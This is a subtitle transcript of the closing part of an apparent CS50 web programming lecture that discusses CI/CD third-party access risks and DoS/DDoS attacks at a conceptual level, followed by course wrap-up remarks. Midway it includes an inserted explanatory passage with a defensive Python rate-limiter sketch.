01:14:48,300 --> 01:14:48,970
OK.

1666
01:14:48,970 --> 01:14:53,140
Let's go ahead and move on from Django
and talk a little bit about CI/CD.

1667
01:14:53,140 --> 01:14:55,090
And so this is relatively
recent, where we

1668
01:14:55,090 --> 01:14:58,690
were talking about how we
might leverage CI tools,

1669
01:14:58,690 --> 01:15:01,210
where we looked at Travis in
particular, as a tool that we

1670
01:15:01,210 --> 01:15:04,630
can use in order to run tests
and to deploy our code.

1671
01:15:04,630 --> 01:15:07,060
And we connected Travis
to GitHub, whereby

1672
01:15:07,060 --> 01:15:11,200
Travis was able to run tests on our
GitHub code inside of our repositories

1673
01:15:11,200 --> 01:15:14,680
and then check to make sure that
those tests, in fact, passed.

1674
01:15:14,680 --> 01:15:17,770
What vulnerabilities appear there?

1675
01:15:17,770 --> 01:15:20,030
Or what things should we
be considering

1676
01:15:20,030 --> 01:15:21,620
when we start to think about that?

1677
01:15:21,620 --> 01:15:22,120
Yeah?

1678
01:15:22,120 --> 01:15:24,430
AUDIENCE: You're giving Travis
access to your codebase.

1679
01:15:24,430 --> 01:15:25,060
BRIAN YU: Yeah, exactly.

1680
01:15:25,060 --> 01:15:27,230
We're now giving Travis
access to our codebase.

1681
01:15:27,230 --> 01:15:31,280
So whereas before, our code was
stored on GitHub and GitHub alone,

1682
01:15:31,280 --> 01:15:33,280
such that, certainly, if
GitHub was compromised,

1683
01:15:33,280 --> 01:15:35,480
now our code is compromised as well.

1684
01:15:35,480 --> 01:15:39,310
Now we've given Travis access to
all of our private repositories

1685
01:15:39,310 --> 01:15:41,620
on GitHub potentially,
such that now there

1686
01:15:41,620 --> 01:15:43,609
are two points at
which being compromised

1687
01:15:43,609 --> 01:15:45,400
could result in our
code being compromised.

1688
01:15:45,400 --> 01:15:48,280
Whereby if GitHub is compromised,
our code is compromised.

1689
01:15:48,280 --> 01:15:51,281
But likewise, if Travis is
compromised for some security reason,

1690
01:15:51,281 --> 01:15:53,530
then our code might also be
compromised because Travis

1691
01:15:53,530 --> 01:15:56,260
has access to our GitHub account.

1692
01:15:56,260 --> 01:15:58,540
And so any time you
deal with accounts that

1693
01:15:58,540 --> 01:16:02,319
are able to grant permission to
other applications or other accounts

1694
01:16:02,319 --> 01:16:05,110
to get access to that information,
that's where there's potentially

1695
01:16:05,110 --> 01:16:06,860
room for security vulnerabilities.

1696
01:16:06,860 --> 01:16:09,120
And so we see that with
GitHub, where GitHub

1697
01:16:09,120 --> 01:16:11,680
allows you to authorize other
applications, giving them

1698
01:16:11,680 --> 01:16:14,080
permission to have access
to your information as well.

1699
01:16:14,080 --> 01:16:15,871
But you see this in
other websites as well.

1700
01:16:15,871 --> 01:16:18,850
In fact, Facebook does this, and it has
been under controversy recently

1701
01:16:18,850 --> 01:16:23,470
for the idea that it can grant
third-party applications the right

1702
01:16:23,470 --> 01:16:25,120
to look at your user information.

1703
01:16:25,120 --> 01:16:27,370
And if you grant a third-party
application that right,

1704
01:16:27,370 --> 01:16:30,190
now if any one of those is compromised,
then your own user information

1705
01:16:30,190 --> 01:16:30,815
is compromised.

1706
01:16:30,815 --> 01:16:32,890
And so it's the same
type of thing, where

1707
01:16:32,890 --> 01:16:37,120
you want to be careful about if
you're giving access to one website,

1708
01:16:37,120 --> 01:16:39,460
giving one website access
to your user information

1709
01:16:39,460 --> 01:16:44,050
or your code and your repositories,
then what other services also

1710
01:16:44,050 --> 01:16:46,641
have the same access to
that information as well.

1711
01:16:46,641 --> 01:16:48,640
And so if you're the one
designing the services,

1712
01:16:48,640 --> 01:16:51,820
you want to be careful about what
other services you give access to.

1713
01:16:51,820 --> 01:16:53,710
And if you're the one
using GitHub or Travis,

1714
01:16:53,710 --> 01:16:56,980
you also want to be careful about
how many different third-party

1715
01:16:56,980 --> 01:17:02,670
services have access to all of your
private repositories, for example.

1716
01:17:02,670 --> 01:17:05,860
And so as a final example, moving
on to what we covered just recently,

1717
01:17:05,860 --> 01:17:08,200
last week, in terms of the
topics we were talking about,

1718
01:17:08,200 --> 01:17:11,050
we talked a little bit about
scalability and the idea

1719
01:17:11,050 --> 01:17:13,960
that once we've written our application
and we're ready to deploy it,

1720
01:17:13,960 --> 01:17:17,417
we need to think about how we're going
to scale this application as more

1721
01:17:17,417 --> 01:17:19,000
and more users start using it.

1722
01:17:19,000 --> 01:17:22,600
We talked about load balancers and
having multiple different servers.

1723
01:17:22,600 --> 01:17:26,050
And we talked about, in
particular, that any server

1724
01:17:26,050 --> 01:17:29,984
is a finite machine that can only
handle a certain number of requests

1725
01:17:29,984 --> 01:17:31,150
in a certain amount of time.

1726
01:17:31,150 --> 01:17:34,720
Maybe x requests per second for
instance, where x is some number.

1727
01:17:34,720 --> 01:17:39,160
And what potential vulnerabilities
or exploits come about there?

1728
01:17:39,160 --> 01:17:41,140
What could a potentially
malicious hacker

1729
01:17:41,140 --> 01:17:46,184
try to do knowing the constraints
of what our systems are capable of?

1730
01:17:46,184 --> 01:17:50,056
AUDIENCE: Like [INAUDIBLE]
can start DDoSing your system,

1731
01:17:50,056 --> 01:17:52,000
sending a bunch of
requests at the same time.

1732
01:17:52,000 --> 01:17:52,480
BRIAN YU: Exactly.

1733
01:17:52,480 --> 01:17:53,646
Sending a bunch of requests.

1734
01:17:53,646 --> 01:17:57,620
So if a computer, for instance, is
going to-- if our server, for instance,

1735
01:17:57,620 --> 01:18:02,046
can only handle 1,000 requests
per second, and one hacker,

1736
01:18:02,046 --> 01:18:05,170
on their computer, decides that they
want to try and shut down our system--

1737
01:18:05,170 --> 01:18:07,840
maybe they're going to send
1,001 requests in a single second

1738
01:18:07,840 --> 01:18:08,800
to our server.

1739
01:18:08,800 --> 01:18:12,895
And this is what we'll generally call
a DoS, or denial-of-service attack,

1740
01:18:12,895 --> 01:18:17,440
where a user tries to send
request after request after request

1741
01:18:17,440 --> 01:18:19,390
in an attempt to overload
our servers in order

1742
01:18:19,390 --> 01:18:22,330
to try and make sure that we're
unable to handle all the requests that

1743
01:18:22,330 --> 01:18:22,913
are coming in.

1744
01:18:22,913 --> 01:18:26,070
And if we're handling all of the
requests coming in from one user,

1745
01:18:26,070 --> 01:18:29,080
then we're potentially not
able to handle requests

1746
01:18:29,080 --> 01:18:31,900
coming from other people as well.

1747
01:18:31,900 --> 01:18:34,450
Of course, this probably
isn't too much of an issue

1748
01:18:34,450 --> 01:18:38,050
if we've got dozens
and dozens of servers

1749
01:18:38,050 --> 01:18:41,020
and only one computer is the
one making a lot of requests.

1750
01:18:41,020 --> 01:18:42,790
Which is why the next
thing you mentioned

1751
01:18:42,790 --> 01:18:45,950
was also a potential exploit
or a potential concern,

1752
01:18:45,950 --> 01:18:50,140
which is that what if it's not just
one, single computer, but a whole botnet

1753
01:18:50,140 --> 01:18:54,550
of a bunch of computers that are all
trying to make requests to the same web

1754
01:18:54,550 --> 01:18:55,900
server at the same time?

1755
01:18:55,900 --> 01:18:57,820
This is what we generally
call a DDoS attack,

1756
01:18:57,820 --> 01:18:59,980
a distributed
denial-of-service attack, where

1757
01:18:59,980 --> 01:19:01,840
we have a lot of
different computers that

1758
01:19:01,840 --> 01:19:05,510
are all trying to make requests at the
same time to our same web application.

1759
01:19:05,510 --> 01:19:07,990
And as a result, it's quite
likely that the web application

1760
01:19:07,990 --> 01:19:11,120
might be overloaded by all these
requests and be unable to handle them.

1761
01:19:11,120 --> 01:19:15,037
And so what are ways of potentially
dealing with a DDoS attack?

1762
01:19:15,037 --> 01:19:17,620
Of a bunch of people trying to
make requests at the same time,

1763
01:19:17,620 --> 01:19:22,071
trying to shut down our server by
overloading it with too many requests?

1764
01:19:22,071 --> 01:19:22,570
Yeah.

1765
01:19:22,570 --> 01:19:24,400
AUDIENCE: Limit how many
requests they can make.

1766
01:19:24,400 --> 01:19:25,790
BRIAN YU: Try and limit how
many requests they can make.

1767
01:19:25,790 --> 01:19:27,760
So certainly one potential
approach to dealing

1768
01:19:27,760 --> 01:19:31,540
with DDoS attacks is to try and add
some sort of filtering system of trying

1769
01:19:31,540 --> 01:19:34,470
to-- before it actually gets to
the server, try and filter and see

1770
01:19:34,470 --> 01:19:35,770
is this a valid request or not?

1771
01:19:35,770 --> 01:19:37,965
And maybe there are heuristics
you can use for that.

1772
01:19:37,965 --> 01:19:40,090
And certainly, if you can
limit people, that if you

1773
01:19:40,090 --> 01:19:43,540
notice that this particular
computer is making a lot of requests

1774
01:19:43,540 --> 01:19:45,880
at the same time or in a
short amount of time, then

1775
01:19:45,880 --> 01:19:47,671
maybe you can put
downward pressure on that

1776
01:19:47,671 --> 01:19:49,380
by blacklisting that particular user.

1777
01:19:49,380 --> 01:19:51,550
So that's certainly something
we could think about as well.
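
One way to limit how many requests a single client can make is a sliding-window counter. The Python sketch below is only an illustration under assumed numbers: the class name, the limit, the window length, and the use of an IP-address string as the client ID are all hypothetical, and in practice this filtering usually happens in a proxy, load balancer, or upstream provider rather than in application code.

```python
import time
from collections import defaultdict, deque
from typing import Callable, Deque, Dict

class RateLimiter:
    """Hypothetical per-client limiter: at most max_requests per window."""

    def __init__(self, max_requests: int, window_seconds: float,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.max_requests = max_requests
        self.window = window_seconds
        self.clock = clock
        # For each client, timestamps of its recently accepted requests.
        self.history: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, client_id: str) -> bool:
        now = self.clock()
        recent = self.history[client_id]
        # Forget timestamps that have slid out of the window.
        while recent and now - recent[0] >= self.window:
            recent.popleft()
        if len(recent) >= self.max_requests:
            return False  # Over the limit: reject (for example with HTTP 429).
        recent.append(now)
        return True
```

As the lecture goes on to point out, this only slows down individual clients; a DDoS spread across many machines, each staying under the limit, still gets through, which is why the defense ultimately moves to the infrastructure level.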

1778
01:19:51,550 --> 01:19:53,466
But in the end,
it really often does

1779
01:19:53,466 --> 01:19:56,340
come down to just a battle of
resources, of who has more resources.

1780
01:19:56,340 --> 01:19:58,810
Is it the adversary or is it yourself?

1781
01:19:58,810 --> 01:20:01,186
And so oftentimes this is not
something that you can just

1782
01:20:01,186 --> 01:20:03,185
deal with at the web
application level, but it's

1783
01:20:03,185 --> 01:20:06,390
something that needs to be dealt with
at the server level or the ISP level.

1784
01:20:06,390 --> 01:20:08,280
Where you really need to make
sure that your infrastructure is

1785
01:20:08,280 --> 01:20:11,550
in place, especially if you're
dealing with a large web application,

1786
01:20:11,550 --> 01:20:15,360
to make sure that you're able to
handle all of that potential traffic.

1787
01:20:15,360 --> 01:20:18,450
And so certainly, the end idea
of this and of all the topics

1788
01:20:18,450 --> 01:20:21,420
we've talked about so far today
is that through all of the things

1789
01:20:21,420 --> 01:20:24,590
we've talked about, whether it was
just a simple, static HTML web page

1790
01:20:24,590 --> 01:20:28,170
or dealing with scalability and Flask
and Django and other web services,

1791
01:20:28,170 --> 01:20:31,710
or JavaScript and how we might be able
to inject JavaScript code into our web

1792
01:20:31,710 --> 01:20:35,070
application, there are security
vulnerabilities everywhere.

1793
01:20:35,070 --> 01:20:37,170
And it's definitely a
good idea to be thinking

1794
01:20:37,170 --> 01:20:39,300
about what those
vulnerabilities might be

1795
01:20:39,300 --> 01:20:42,840
and how we might be able to
deal with them when they arise.

1796
01:20:42,840 --> 01:20:47,190
And so now let's think about
moving beyond just this course

1797
01:20:47,190 --> 01:20:49,440
as we arrive at the
conclusion of the course.

1798
01:20:49,440 --> 01:20:50,400
What comes next?

1799
01:20:50,400 --> 01:20:52,020
If this is still something
that interests you,

1800
01:20:52,020 --> 01:20:53,370
if web programming is
something that you're

1801
01:20:53,370 --> 01:20:55,291
interested in continuing
to learn more about,

1802
01:20:55,291 --> 01:20:57,540
we were just really barely
scratching the surface here

1803
01:20:57,540 --> 01:21:00,180
when it came to programming
with Python and JavaScript.

1804
01:21:00,180 --> 01:21:04,170
We looked at Flask and Django in
particular as the web frameworks

1805
01:21:04,170 --> 01:21:07,230
that we were using in order to build
and design and deploy our websites.

1806
01:21:07,230 --> 01:21:09,800
But those certainly are
not the only options.

1807
01:21:09,800 --> 01:21:12,304
There are other web frameworks
that are gaining popularity

1808
01:21:12,304 --> 01:21:14,220
in modern times, nowadays,
that are definitely

1809
01:21:14,220 --> 01:21:17,011
worth looking into if this is the
sort of thing that interests you.

1810
01:21:17,011 --> 01:21:20,100
Generally, we can divide them
into server-side frameworks,

1811
01:21:20,100 --> 01:21:23,130
the sort of frameworks that are going
to be running like Flask or Django

1812
01:21:23,130 --> 01:21:28,500
on our web server somewhere,
where Express.js and Ruby on Rails

1813
01:21:28,500 --> 01:21:31,420
are examples of some server-side
frameworks that are commonly used.

1814
01:21:31,420 --> 01:21:32,086
Actually, sorry.

1815
01:21:32,086 --> 01:21:35,010
This is mislocated a little bit.

1816
01:21:35,010 --> 01:21:38,794
And client-side frameworks include
things like React or Angular

1817
01:21:38,794 --> 01:21:41,460
that are common frameworks that
are used on the client side now,

1818
01:21:41,460 --> 01:21:44,460
in order to generate
components that are displayed

1819
01:21:44,460 --> 01:21:47,630
and that are able to interact with
the web server in some way.

1820
01:21:47,630 --> 01:21:50,140
And so these are definitely
things to look at as well.

1821
01:21:50,140 --> 01:21:53,019
And then when it comes to actually
taking your web application

1822
01:21:53,019 --> 01:21:54,810
and deploying it to
the internet, if that's

1823
01:21:54,810 --> 01:21:56,880
something that's of
interest to you as well,

1824
01:21:56,880 --> 01:21:58,740
there are a whole
number of other services

1825
01:21:58,740 --> 01:22:00,156
that you can use as well for that.

1826
01:22:00,156 --> 01:22:02,100
So GitHub Pages was one
that we looked at way

1827
01:22:02,100 --> 01:22:04,391
at the very beginning of the
course, which is generally

1828
01:22:04,391 --> 01:22:08,250
used if we just want to deploy some
static content to a page like HTML

1829
01:22:08,250 --> 01:22:09,540
and CSS and JavaScript.

1830
01:22:09,540 --> 01:22:11,269
And that's totally
fine for GitHub Pages.

1831
01:22:11,269 --> 01:22:14,310
But if we want to run a web server,
we're going to need a little bit more

1832
01:22:14,310 --> 01:22:15,160
than that.

1833
01:22:15,160 --> 01:22:17,280
And so we did look a
little bit at Heroku

1834
01:22:17,280 --> 01:22:19,310
when we were thinking
about using our database.

1835
01:22:19,310 --> 01:22:23,370
So Heroku is a service that allows us to
host web applications on the internet.

1836
01:22:23,370 --> 01:22:26,400
It makes it relatively easy to take
a Flask or Django web application

1837
01:22:26,400 --> 01:22:27,252
and host it.

1838
01:22:27,252 --> 01:22:30,210
And in particular, it makes it very
easy to hook that up to a database,

1839
01:22:30,210 --> 01:22:33,150
for instance, in order to connect
it with a PostgreSQL database,

1840
01:22:33,150 --> 01:22:35,400
as we did in one of the
early projects in order

1841
01:22:35,400 --> 01:22:37,560
to allow us to deploy that as well.

1842
01:22:37,560 --> 01:22:41,580
But if you're looking for even more
power and even more feature-filled web

1843
01:22:41,580 --> 01:22:44,910
hosting than that, you can take a look
at Amazon Web Services or Google Cloud

1844
01:22:44,910 --> 01:22:48,360
or Microsoft Azure, all of which
offer a lot of different services

1845
01:22:48,360 --> 01:22:51,300
for taking web applications and
deploying them to the internet.

1846
01:22:51,300 --> 01:22:53,841
They often will use Docker,
which we looked at a little while

1847
01:22:53,841 --> 01:22:56,790
back when we were talking about
containerizing our application

1848
01:22:56,790 --> 01:22:59,820
and bundling together our web
application with the database

1849
01:22:59,820 --> 01:23:03,000
and any other services that might be
involved in running that application.

1850
01:23:03,000 --> 01:23:04,860
And so certainly these
are services that you

1851
01:23:04,860 --> 01:23:07,680
can use as well if you're thinking
about actually building out

1852
01:23:07,680 --> 01:23:10,350
one of these web applications
and deploying it to the internet.

1853
01:23:10,350 --> 01:23:13,560
And these larger services
like AWS or Microsoft Azure,

1854
01:23:13,560 --> 01:23:16,786
they have the ability to take care
of some of the scalability concerns

1855
01:23:16,786 --> 01:23:17,910
that we were talking about.

1856
01:23:17,910 --> 01:23:20,310
The ability to add
load balancers that are

1857
01:23:20,310 --> 01:23:23,212
able to make sure that
we have enough servers

1858
01:23:23,212 --> 01:23:25,920
to make sure that we're able to
handle all the requests coming in

1859
01:23:25,920 --> 01:23:27,210
from all the different users.

1860
01:23:27,210 --> 01:23:29,700
And they do autoscaling such
that as more users come in,

1861
01:23:29,700 --> 01:23:33,130
we can increase the number of servers, or, as users leave,
decrease the number of servers as well.

1862
01:23:33,130 --> 01:23:36,600
And so these are increasingly
popular tools and technologies

1863
01:23:36,600 --> 01:23:39,780
that are ways of allowing people to
take web applications that they're

1864
01:23:39,780 --> 01:23:44,010
building on their own computers and
ultimately deploy them to the internet.

1865
01:23:44,010 --> 01:23:46,586
Before we wrap up, I just want
to make sure to say thank you

1866
01:23:46,586 --> 01:23:48,960
to all the people that were
really instrumental in making

1867
01:23:48,960 --> 01:23:50,040
the course possible.

1868
01:23:50,040 --> 01:23:53,060
To David, my co-instructor, who
unfortunately couldn't be here today.

1869
01:23:53,060 --> 01:23:56,207
But also to our great teaching
fellows, Anushree and Elle and Rodrigo

1870
01:23:56,207 --> 01:23:58,290
and Sebastian and Jessica
for running the course's

1871
01:23:58,290 --> 01:24:00,210
office hours and the course's sections.

1872
01:24:00,210 --> 01:24:03,360
And of course, CS50's
production team, Ramon and Andrew

1873
01:24:03,360 --> 01:24:06,450
and Max and Meredith and Ian
and Scully and Dan and Arturo

1874
01:24:06,450 --> 01:24:09,180
for making the lectures possible
and the lecture videos possible.

1875
01:24:09,180 --> 01:24:10,230
Thank you to you all.

1876
01:24:10,230 --> 01:24:13,560
And of course, finally, thank you to all
of you for joining us in this course,

1877
01:24:13,560 --> 01:24:16,230
for learning about web programming
with Python and JavaScript.

1878
01:24:16,230 --> 01:24:17,160
Hope you enjoyed it.

1879
01:24:17,160 --> 01:24:20,070
Hope you got an opportunity to
work on some hands-on projects that

1880
01:24:20,070 --> 01:24:22,890
were exciting and ultimately
showed you the power and capacity

1881
01:24:22,890 --> 01:24:26,100
that Python and JavaScript have for
building really dynamic and really

1882
01:24:26,100 --> 01:24:27,840
interesting web applications.

1883
01:24:27,840 --> 01:24:31,029
Can't wait to see what you guys
continue to do with your final projects.

1884
01:24:31,029 --> 01:24:33,570
But that's it for web programming
with Python and JavaScript,

1885
01:24:33,570 --> 01:24:35,640
so thank you all so much.

1886
01:24:35,640 --> 01:24:39,890
[APPLAUSE]

1887
01:24:39,890 --> 01:24:40,641